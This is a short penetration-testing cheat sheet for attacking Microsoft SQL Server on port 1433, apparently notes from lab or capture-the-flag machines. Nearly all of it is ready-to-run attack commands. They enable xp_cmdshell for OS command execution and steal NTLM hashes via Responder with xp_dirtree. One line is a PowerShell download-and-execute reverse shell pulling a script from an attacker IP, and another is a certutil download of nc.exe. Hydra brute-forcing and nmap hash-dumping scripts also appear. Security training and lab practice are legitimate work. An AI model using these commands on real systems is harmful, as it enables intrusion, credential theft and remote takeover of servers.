🫢Port 1433 (MSSQL)

impacket

mssqlclient.py -windows-auth reporting@10.10.10.125
SQL>

shell

SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami

querier\mssql-svc

sqsh

sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1

mssql commands

select IS_SRVROLEMEMBER (​ 'sysadmin'​ ) # check permisions

responder

steal hashes of the SQL service account by using xp_dirtree or xp_fileexist.

• en kali:

  responder -I tun0 -rv

• en windows

  SQL>exec xp_dirtree '\\10.10.14.6\share\file'
  SQL>exec xp_fileexist '\\10.10.16.2\share\file'

mssql reverse shell

SQL> xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.6/Invoke-PowerShellTcp.ps1\")

nmap nse

ms-sql-brute.nse
ms-sql-config.nse
ms-sql-dac.nse
ms-sql-dump-hashes.nse
ms-sql-empty-password.nse
ms-sql-hasdbaccess.nse
ms-sql-info.nse
ms-sql-ntlm-info.nse
ms-sql-query.nse
ms-sql-tables.nse
ms-sql-xp-cmdshell.nse

Get information

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

Having credentials

mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

# Once logged in you can run queries:
SQL> select @@ version;

# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with john or hashcat

# Try to enable code execution
SQL> enable_xp_cmdshell

# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe

Manual exploit

Cheatsheet :
	- https://www.asafety.fr/mssql-injection-cheat-sheet/